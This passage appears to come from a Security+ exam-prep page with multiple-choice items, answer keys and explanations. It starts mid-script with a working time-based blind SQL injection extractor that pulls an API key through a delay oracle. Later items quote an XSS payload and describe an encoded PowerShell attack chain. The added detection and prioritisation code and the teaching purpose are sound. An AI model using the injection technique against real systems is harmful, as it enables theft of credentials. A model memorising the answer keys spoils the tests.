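

def timed_true(conn: sqlite3.Connection, condition: str) -> bool:
    """Send one payload and report whether the server stalled (condition was true)."""
    payload = (
        f"%' AND 1=(SELECT CASE WHEN {condition} THEN sleep({SLEEP_SECONDS}) ELSE 1 END "
        f"FROM users WHERE username='admin') --"
    )
    start = time.perf_counter()
    search_vulnerable(conn, payload)        # the result set looks normal either way
    return time.perf_counter() - start >= SLEEP_SECONDS * 0.8


def extract_char(conn: sqlite3.Connection, position: int) -> str:
    """Binary search over printable ASCII using only the delay as an oracle."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if timed_true(conn, f"unicode(substr(api_key,{position},1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_key(conn: sqlite3.Connection, length: int) -> str:
    return "".join(extract_char(conn, i) for i in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("normal search:", search_vulnerable(db, "lam"))
    print("recovered key:", extract_key(db, 3))
```

About seven timed requests recover one character, which is why a log showing the same search term repeated with a fixed delay is the tell: nothing in the responses changes, only their timing. The parameterised query from the earlier SQL injection question closes this the same way it closes the error-based variant, since the condition never reaches the SQL parser.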
Based on the exhibit, which finding should the security team remediate first?
A.LAP09 because user devices are always the easiest to patch
B.WEB01 because it is internet-facing and has a critical exploitable vulnerability
C.PRN01 because firmware issues can affect many users
D.FILE02 because internal servers are always more important than public ones
AnswerB
WEB01 should be remediated first because it is public-facing, rated critical, and already has a known exploit. Exposure and exploitability greatly increase risk, so this finding has the highest immediate urgency. When patching resources are limited, internet-facing critical vulnerabilities are typically prioritized before internal or low-severity issues.
Why this answer
WEB01 is internet-facing and has a critical exploitable vulnerability, meaning an attacker can directly compromise it from the public internet with minimal effort. This represents the highest risk because it combines high likelihood (exploit available) with high impact (full compromise of a public-facing server). Remediating this first aligns with the principle of prioritizing externally exposed systems with known critical flaws over internal or less severe issues.
Exam trap
The trap here is that candidates prioritize based on ease of remediation (A) or internal importance (D) instead of applying a risk-based approach that considers both the severity of the vulnerability and the exposure of the asset.
How to eliminate wrong answers
Option A is wrong because LAP09 being 'easiest to patch' does not equate to highest risk; patching ease is irrelevant when a critical internet-facing vulnerability exists. Option C is wrong because PRN01's firmware issue, while potentially affecting many users, is internal and typically lower severity than a critical remote code execution on a public server. Option D is wrong because internal servers are not inherently more important than public ones; the criticality and exposure of the vulnerability determine priority, not a blanket rule about server location.
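Both prioritization questions above (the VPN-only lab server versus the exploited file transfer appliance, and WEB01 in this exhibit) apply the same rule: order findings by the factors that drive likelihood before raw severity. The ranking below is an added example, not code or policy from the original page; the CVSS values, the remediation windows and the idea of sourcing "exploited in the wild" from a catalog such as CISA's KEV list are assumptions made for the demonstration.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    asset: str
    cvss: float
    internet_facing: bool
    exploited_in_wild: bool   # e.g. listed in CISA's KEV catalog (assumed source)
    business_critical: bool = True


def severity(cvss: float) -> str:
    """CVSS v3.x qualitative rating bands."""
    if cvss >= 9.0:
        return "critical"
    if cvss >= 7.0:
        return "high"
    if cvss >= 4.0:
        return "medium"
    return "low" if cvss > 0 else "none"


def priority_key(f: Finding):
    """Likelihood drivers first, raw severity last: an actively exploited,
    reachable high outranks an isolated critical."""
    return (f.exploited_in_wild, f.internet_facing, f.cvss, f.business_critical)


def prioritize(findings):
    return sorted(findings, key=priority_key, reverse=True)


def remediation_window_days(f: Finding) -> int:
    """Assumed policy tiers for the example, not from the page or any standard."""
    if f.exploited_in_wild and f.internet_facing:
        return 3
    if f.exploited_in_wild or (f.internet_facing and severity(f.cvss) == "critical"):
        return 14
    if severity(f.cvss) in ("critical", "high"):
        return 30
    return 90


# Constructed findings loosely modelled on the two questions (CVSS values assumed).
SAMPLE_FINDINGS = [
    Finding("lab-server (VPN only)", 9.8, internet_facing=False, exploited_in_wild=False,
            business_critical=False),
    Finding("file-transfer appliance", 8.1, internet_facing=True, exploited_in_wild=True),
    Finding("WEB01", 9.1, internet_facing=True, exploited_in_wild=True),
    Finding("LAP09", 6.5, internet_facing=False, exploited_in_wild=False,
            business_critical=False),
]


def ranked_assets(findings=SAMPLE_FINDINGS) -> list:
    return [f.asset for f in prioritize(findings)]


if __name__ == "__main__":
    for f in prioritize(SAMPLE_FINDINGS):
        print(f"{f.asset:28s} {severity(f.cvss):8s} fix within {remediation_window_days(f):3d} days")
```

The tuple key is deliberate: it refuses to let a 9.8 on an isolated host climb above an 8.1 that is reachable and being exploited, which is exactly the trap both questions set. Real programs usually fold in an exploit-probability signal and asset criticality as well, but the ordering of the factors is the part that matters.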
A user forwards an email that says a shared document is available and must be reviewed within 10 minutes. The display name looks like a trusted vendor, but the Reply-To address points to a free webmail account. Which two details are strongest indicators that this is a phishing attempt? Select two.
Select 2 answers
A.The message creates a short deadline and pressures the user to act quickly.
B.The Reply-To address uses a free webmail domain instead of the vendor's corporate domain.
C.The message includes the company's logo and professional-looking formatting.
D.The email refers to a shared document that the user should review.
E.The message was received during normal business hours.
AnswersA, B
Urgency is a classic phishing tactic because it pushes recipients to react before verifying the request. A short deadline increases the chance that the user clicks a link or shares credentials without checking the sender or context. The Reply-To address on a free webmail domain is the harder technical indicator: the display name can be anything the sender types, but replies go to the address in Reply-To, and a real vendor would set that to its own corporate domain.
Why this answer
Option A is correct because phishing attacks frequently use urgency and time pressure to bypass the victim's rational analysis, exploiting the psychological principle of scarcity to trigger impulsive clicks. The 10-minute deadline is a classic social engineering tactic to prevent the user from verifying the email's legitimacy through normal channels.
Exam trap
CompTIA often tests the distinction between easily spoofed visual elements (logos, formatting) and verifiable technical indicators (Reply-To domain mismatch, urgency cues) to catch candidates who rely on superficial appearance rather than email authentication mechanisms.
After a workstation reboot, users see many files renamed with random extensions. A ransom note demands cryptocurrency, and Volume Shadow Copies were deleted from the machine. What malware type is most likely?
A.Trojan, because the malware may have been disguised as a legitimate application.
B.Worm, because the malware likely spread automatically to other systems.
C.Ransomware, because the files were encrypted and payment was demanded.
D.Rootkit, because the attacker would want to hide persistence on the system.
AnswerC
Ransomware commonly encrypts files, deletes recovery options, and leaves a ransom note demanding payment. The random extensions and removed shadow copies are classic clues that the attacker wants to block restoration until payment is made.
Why this answer
The scenario describes files renamed with random extensions (indicating encryption), a ransom note demanding cryptocurrency, and deletion of Volume Shadow Copies (VSS) to prevent file recovery. These are hallmark behaviors of ransomware, specifically a crypto-ransomware variant that encrypts user data and removes backup copies to maximize extortion pressure.
Exam trap
The trap here is that candidates see 'files renamed' and 'ransom note' but may confuse the delivery method (Trojan) or propagation (Worm) with the actual malware type, which is defined by its payload—encryption for extortion—not how it arrived or spread.
How to eliminate wrong answers
Option A is wrong because a Trojan is a type of malware that disguises itself as legitimate software, but the core behavior here is file encryption and ransom demand, not just deception. Option B is wrong because a Worm self-replicates and spreads automatically across networks without user interaction, but the question focuses on the post-reboot encryption and ransom note, not propagation. Option D is wrong because a Rootkit is designed to hide its presence and maintain stealthy persistence, but the visible symptoms are encrypted files and a ransom demand, not hidden processes or stealth.
Based on the exhibit, which malware type best explains the behavior?
A.Trojan
B.Rootkit
C.Logic bomb
D.Spyware
AnswerB
The exhibit shows a hidden listener associated with PID 4, an unsigned driver, and a mismatch between user-mode process enumeration and kernel telemetry. Those are classic rootkit indicators because rootkits operate at a low level to conceal processes, ports, or files from standard tools. The suspicious driver name and kernel-level inconsistency are especially strong clues that the malware is trying to hide itself from the operating system and defenders.
Why this answer
A rootkit is designed to hide its presence and the presence of other malware by modifying the operating system's kernel or system calls, allowing it to evade detection by security tools. The exhibit likely shows behavior such as file hiding, process concealment, or system call interception, which are hallmarks of rootkit activity. This aligns with the SY0-701 objective on understanding malware types and their characteristics.
Exam trap
The trap here is that candidates often confuse a rootkit's stealth capabilities with a Trojan's deceptive delivery method, failing to recognize that the exhibit's focus on hiding and persistence at the OS level is unique to rootkits, not general malware types.
How to eliminate wrong answers
Option A (Trojan) is wrong because a Trojan disguises itself as legitimate software to trick users into installing it, but it does not inherently hide its presence or modify the kernel to evade detection; the exhibit's behavior of stealth and system-level concealment is not typical of a Trojan. Option C (Logic bomb) is wrong because a logic bomb is a piece of code that executes a malicious payload when specific conditions are met (e.g., a date or user action), but it does not actively hide itself or its processes; the exhibit's ongoing stealth behavior is inconsistent with a dormant trigger-based mechanism. Option D (Spyware) is wrong because spyware focuses on covertly collecting user data (e.g., keystrokes, browsing habits) and sending it to an attacker, but it does not typically modify the OS kernel or hide its own files and processes at the rootkit level; the exhibit's system-level concealment goes beyond spyware's typical user-space monitoring.
Based on the exhibit, which security issue should the analyst report first?
A.Outdated component, because the scan did not list software version details.
B.Exposed service, because VNC and the web admin interface are reachable from untrusted networks.
C.Weak permissions, because SSH requires password login only.
D.Default credentials, because the server is in the DMZ.
AnswerB
The most important issue is the exposed service because remote management interfaces are reachable from any source network, and VNC authentication is disabled. That combination creates a high-risk attack surface, especially for a server in the DMZ that stores sensitive customer information.
Why this answer
Option B is correct because the scan reveals that VNC (port 5900) and a web admin interface (port 443 or 8080) are exposed to untrusted networks, such as the internet. This violates the principle of least exposure, as these services are known attack vectors for remote code execution and credential theft. The analyst should prioritize this issue because an exposed service directly increases the attack surface and risk of unauthorized access, whereas other findings may be less immediately critical.
Exam trap
The trap here is that candidates often focus on missing version details (Option A) or default credentials (Option D) as the most critical finding, but CompTIA emphasizes that exposed services on untrusted networks pose the highest immediate risk because they are directly exploitable without requiring prior access.
How to eliminate wrong answers
Option A is wrong because the absence of software version details in the scan does not necessarily indicate an outdated component; it may simply mean the scanner could not fingerprint the version due to banner hiding or firewall restrictions. Option C is wrong because SSH requiring password login only is not inherently a weak permission; weak permissions refer to file or directory access controls, not authentication methods, and password-based SSH is still common in many environments. Option D is wrong because default credentials are not indicated by the server being in the DMZ; the scan does not show any evidence of default username/password usage, and the DMZ placement alone does not confirm this vulnerability.
A SOC analyst reviews an EDR alert on a Windows workstation. PowerShell was launched by a scheduled task, downloaded an encoded command from an external server, and then spawned rundll32.exe. No suspicious executable was written to disk. Which type of threat best fits this activity?
A.Trojan
B.Fileless attack
C.Rootkit
D.Worm
AnswerB
Fileless attacks often use trusted tools like PowerShell to run malicious code in memory without leaving a traditional executable behind.
Why this answer
The attack is fileless because it executes entirely in memory without writing a malicious executable to disk. PowerShell downloads an encoded command from an external server and spawns rundll32.exe to run code via DLL execution, leveraging living-off-the-land binaries (LOLBins) to evade traditional antivirus and disk-based detection.
Exam trap
The trap here is that candidates see 'downloaded an encoded command' and assume a file was written, but the key distinction is that no executable file was written to disk, making it a fileless attack rather than a Trojan or rootkit.
How to eliminate wrong answers
Option A is wrong because a Trojan is a malicious program disguised as legitimate software that typically writes a file to disk and requires user installation, whereas this attack uses a scheduled task to launch PowerShell and never writes a suspicious executable. Option C is wrong because a rootkit is designed to hide the presence of malware or maintain privileged access by modifying the operating system kernel or boot process, which is not indicated by the PowerShell-to-rundll32 chain and lack of persistence mechanisms described.
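The chain described above (scheduled task, PowerShell with an encoded command, outbound fetch, rundll32.exe child, nothing written to disk) can be scored from process-start telemetry. This is an added Python example, not code from the page or any EDR product; the event records are constructed, the field names and the three-indicator threshold are assumptions, and the Task Scheduler host matching reflects the common svchost "-s Schedule" and older taskeng.exe parents.

```python
from collections import defaultdict

# Constructed EDR-style process-start records (not real telemetry). PID 1 is the
# Task Scheduler service host, PID 2 the PowerShell instance from the alert, PID 3
# its rundll32.exe child; PID 4 is a benign scheduled maintenance script.
PROCESS_EVENTS = [
    {"pid": 1, "ppid": 0, "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule", "outbound": False},
    {"pid": 2, "ppid": 1, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand BASE64_PLACEHOLDER",
     "outbound": True},
    {"pid": 3, "ppid": 2, "image": "rundll32.exe", "cmdline": "rundll32.exe",
     "outbound": False},
    {"pid": 4, "ppid": 1, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\cleanup.ps1", "outbound": False},
]

# powershell.exe accepts -EncodedCommand, -ec, -e and any unambiguous prefix.
ENCODED_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, 15)} | {"-ec"}
SCHEDULER_HOSTS = ("taskeng.exe",)  # older Windows; newer hosts it in svchost


def has_encoded_command(cmdline):
    return any(tok.lower() in ENCODED_FLAGS for tok in cmdline.split())


def launched_by_scheduler(parent):
    if parent is None:
        return False
    return (parent["image"].lower() in SCHEDULER_HOSTS
            or "-s schedule" in parent["cmdline"].lower())


def fileless_chain_findings(events, min_indicators=3):
    """Return [(powershell pid, indicators)] for PowerShell starts matching the
    chain in the alert. min_indicators is an assumed tuning value."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        ind = []
        if launched_by_scheduler(by_pid.get(e["ppid"])):
            ind.append("launched_by_scheduled_task")
        if has_encoded_command(e["cmdline"]):
            ind.append("encoded_command")
        if e["outbound"]:
            ind.append("outbound_connection")
        if any(c["image"].lower() == "rundll32.exe" for c in children[e["pid"]]):
            ind.append("spawned_rundll32")
        if len(ind) >= min_indicators:
            findings.append((e["pid"], ind))
    return findings
```

The benign script (PID 4) also runs from the scheduler but has no encoded command, no outbound connection and no rundll32 child, so it stays below the threshold.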
A web form stores a user's comment and later displays it to other users. A tester submits <script>alert(1)</script> and the script runs in the browser. What vulnerability is this?
A.SQL injection
B.Cross-site request forgery
C.Cross-site scripting
D.Command injection
AnswerC
The application renders stored, untrusted input into a page without proper output encoding, allowing script execution in other users' browsers.
Why this answer
The tester's input <script>alert(1)</script> is executed in the browser, which is the classic symptom of a stored (persistent) cross-site scripting (XSS) vulnerability. The web form fails to sanitize or encode user-supplied data before storing it and later rendering it in other users' browsers, allowing arbitrary JavaScript to run in the security context of the application's origin.
Exam trap
The trap here is that candidates may confuse XSS with SQL injection because both involve injecting malicious input, but XSS targets the browser's execution context while SQL injection targets the database query layer.
How to eliminate wrong answers
Option A is wrong because SQL injection involves injecting SQL commands into database queries (e.g., ' OR 1=1 --), not client-side script execution; the input here does not alter a database query. Option B is wrong because cross-site request forgery (CSRF) tricks a victim into performing an unintended action on an authenticated site, but the tester's input directly executes script in the browser without requiring a forged request. Option D is wrong because command injection targets server-side operating system commands (e.g., ; ls -la), not client-side JavaScript execution in the browser.
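The stored XSS above comes down to how the comment is rendered, not how it is stored. This added Python example (not the application's code) puts the vulnerable concatenation beside the hardened version, using a constructed comment list that contains the tester's payload; it also goes one step beyond the question to show that the encoding has to match the output context (element body versus quoted attribute).

```python
import html

# Constructed comment store for the scenario above (not the application's own code):
# one ordinary comment plus the tester's payload from the question.
COMMENTS = [
    "Nice write-up, thanks.",
    "<script>alert(1)</script>",
]


def render_comments_unsafe(comments):
    """Vulnerable: stored comments are concatenated straight into the HTML body,
    so a stored <script> tag reaches every later viewer and executes in the
    application's origin."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_comments_safe(comments):
    """Hardened: each comment is HTML-entity-encoded for the element-body
    context at output time, so '<', '>' and '&' are displayed literally and
    never parsed as markup. The stored value itself is left untouched."""
    return "<ul>" + "".join(
        f"<li>{html.escape(c, quote=True)}</li>" for c in comments) + "</ul>"


def render_author_title_safe(author):
    """Encoding must match the output context: inside a quoted attribute the
    dangerous character is the quote itself, which quote=True turns into &quot;
    so the value cannot break out of the attribute."""
    return f'<a href="/users" title="{html.escape(author, quote=True)}">profile</a>'


def has_live_script_tag(page):
    """Heuristic used only to contrast the two renderers above."""
    return "<script" in page.lower()
```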
A user receives an SMS from 'IT Service Desk' saying their MFA enrollment expires today and includes a shortened link. Five minutes later, the user gets a phone call from the same number asking them to read back the code shown in the authenticator app so the ticket can be closed. Which two attack channels are used in this campaign? Select two.
Select 2 answers
A.Email phishing is used because the attacker is requesting a login action.
B.Smishing is used because the first lure arrives by text message.
C.Vishing is used because the follow-up request occurs by phone call.
D.Baiting is used because the attacker offers a free reward or device.
E.Tailgating is used because the attacker follows someone into a restricted area.
AnswersB, C
Smishing is phishing delivered through SMS or another text-based mobile messaging channel. The fake IT Service Desk text with a shortened link is a classic example because it attempts to get the user to click a link and interact outside the normal support process.
Why this answer
Option B is correct because the initial attack vector is an SMS message containing a shortened link, which is the definition of smishing (SMS phishing). The attacker uses this to create urgency and lure the victim into engaging with the MFA enrollment scam.
Exam trap
The trap here is that candidates may focus on the phone call as the only attack channel and overlook the initial SMS, or they may confuse smishing with vishing, not recognizing that both channels are used sequentially in a single campaign.
An employee receives an email from someone claiming to be from IT. The message says the employee must read back a one-time verification code so their mailbox can be 'repaired.' What social engineering technique is being used?
A.Tailgating, because the attacker is trying to enter a secure area physically.
B.Pretexting, because the attacker is using a fake identity and story to gain trust.
C.DDoS, because the message is designed to overwhelm the mailbox server.
D.Shoulder surfing, because the attacker is watching the screen from nearby.
AnswerB
The attacker is pretending to be IT and inventing a believable support reason to trick the victim into revealing a one-time code.
Why this answer
The attacker is using a fabricated identity (IT support) and a false scenario (mailbox repair requiring a verification code) to manipulate the employee into divulging sensitive information. This is the classic definition of pretexting, where the attacker creates a believable pretext to lower the victim's defenses and extract data or access.
Exam trap
The trap here is that candidates confuse pretexting with phishing, but pretexting specifically relies on a fabricated scenario or identity (the 'pretext') rather than a generic lure like a malicious link or attachment.
How to eliminate wrong answers
Option A is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, not a social engineering technique involving email or phone. Option C is wrong because a DDoS (Distributed Denial of Service) attack overwhelms a server with traffic to disrupt service, not to trick a user into revealing a code. Option D is wrong because shoulder surfing involves directly observing someone's screen or keyboard from close proximity to steal information, not using a remote email message.
NetFlow and authentication logs show one workstation opening SMB and WinRM sessions to many internal hosts within ten minutes. The same source also generates a sharp rise in Kerberos service-ticket requests and attempts to access administrative shares. Which three observations most strongly support lateral movement rather than normal admin activity? Select three.
Select 3 answers
A.A rapid burst of SMB and WinRM connections to many internal systems from one source host.
B.A sharp increase in Kerberos service-ticket requests from the same workstation.
C.Repeated attempts to access administrative shares such as ADMIN$ or C$.
D.Regular outbound DNS lookups for common internet services like time synchronization or content delivery.
E.A successful sign-in to the user's cloud email account from the employee's home network at lunchtime.
AnswersA, B, C
A sudden fan-out of administrative protocols from one workstation is a classic sign of lateral movement. Normal admin activity is usually more targeted and scheduled. A burst like this suggests an automated attempt to enumerate, authenticate, or execute remotely across the environment.
Why this answer
Option A is correct because a rapid burst of SMB and WinRM connections from a single workstation to many internal hosts is a classic indicator of lateral movement. Normal administrative activity typically involves targeted, sequential connections to specific systems for maintenance, not a broad, automated sweep. This pattern suggests an attacker using tools like PsExec or PowerShell remoting to propagate across the network.
Exam trap
The trap here is that candidates may confuse normal administrative tasks with malicious lateral movement, but the key differentiator is the rapid, broad, and automated nature of the connections, combined with the specific targeting of administrative shares and Kerberos ticket requests, which are not typical for routine admin work.
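The three indicators (A, B, C) can be expressed as a sliding-window rule over normalised NetFlow and authentication events. This is an added Python example, not code from the page; the events are constructed to mirror the scenario (one workstation fanning out, one admin host doing routine work), and the ten-minute window and thresholds are assumed values to be tuned against the environment's admin baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry (not real NetFlow or Windows event exports), normalised to
# (timestamp, source host, event kind, destination host). Event kinds: smb, winrm,
# kerberos_tgs (service-ticket request), admin_share (ADMIN$ / C$ access attempt).
def constructed_events():
    base = datetime(2024, 5, 1, 9, 0, 0)
    ev = []
    # WS-042 behaves like the question: fan-out to 8 hosts over SMB/WinRM in under
    # 3 minutes, a burst of service-ticket requests, and admin-share attempts.
    for i in range(8):
        proto = "smb" if i % 2 else "winrm"
        ev.append((base + timedelta(seconds=20 * i), "WS-042", proto, f"SRV-{i:02d}"))
    for i in range(12):
        ev.append((base + timedelta(seconds=10 * i), "WS-042", "kerberos_tgs", "DC-01"))
    for i in range(3):
        ev.append((base + timedelta(seconds=60 + 15 * i), "WS-042", "admin_share", f"SRV-{i:02d}"))
    # ADM-01 is a routine admin session: two targeted connections 40 minutes apart.
    ev.append((base, "ADM-01", "winrm", "SRV-00"))
    ev.append((base + timedelta(minutes=40), "ADM-01", "smb", "SRV-01"))
    return ev


WINDOW = timedelta(minutes=10)
# Assumed thresholds; tune to the environment's normal admin baseline.
THRESHOLDS = {"fanout_hosts": 5, "tgs_requests": 10, "admin_share_attempts": 1}


def lateral_movement_indicators(events, window=WINDOW, thresholds=THRESHOLDS):
    """Return {source: sorted indicator labels} for every source whose activity in
    some window exceeds a threshold. Labels map to options A, B and C above."""
    by_src = defaultdict(list)
    for ts, src, kind, dst in sorted(events):
        by_src[src].append((ts, kind, dst))
    findings = {}
    for src, evs in by_src.items():
        hits = set()
        for i, (start, _, _) in enumerate(evs):  # slide the window over each start
            in_win = [e for e in evs[i:] if e[0] - start <= window]
            fanout = {d for _, k, d in in_win if k in ("smb", "winrm")}
            tgs = sum(1 for _, k, _ in in_win if k == "kerberos_tgs")
            shares = sum(1 for _, k, _ in in_win if k == "admin_share")
            if len(fanout) >= thresholds["fanout_hosts"]:
                hits.add("A:smb_winrm_fanout")
            if tgs >= thresholds["tgs_requests"]:
                hits.add("B:kerberos_tgs_burst")
            if shares >= thresholds["admin_share_attempts"]:
                hits.add("C:admin_share_access")
        if hits:
            findings[src] = sorted(hits)
    return findings


if __name__ == "__main__":
    for src, labels in lateral_movement_indicators(constructed_events()).items():
        print(src, labels)
```

Options D and E are deliberately absent from the event model: DNS lookups for common services and a lunchtime cloud sign-in are not inputs to this rule, which is why they do not distinguish lateral movement from routine work.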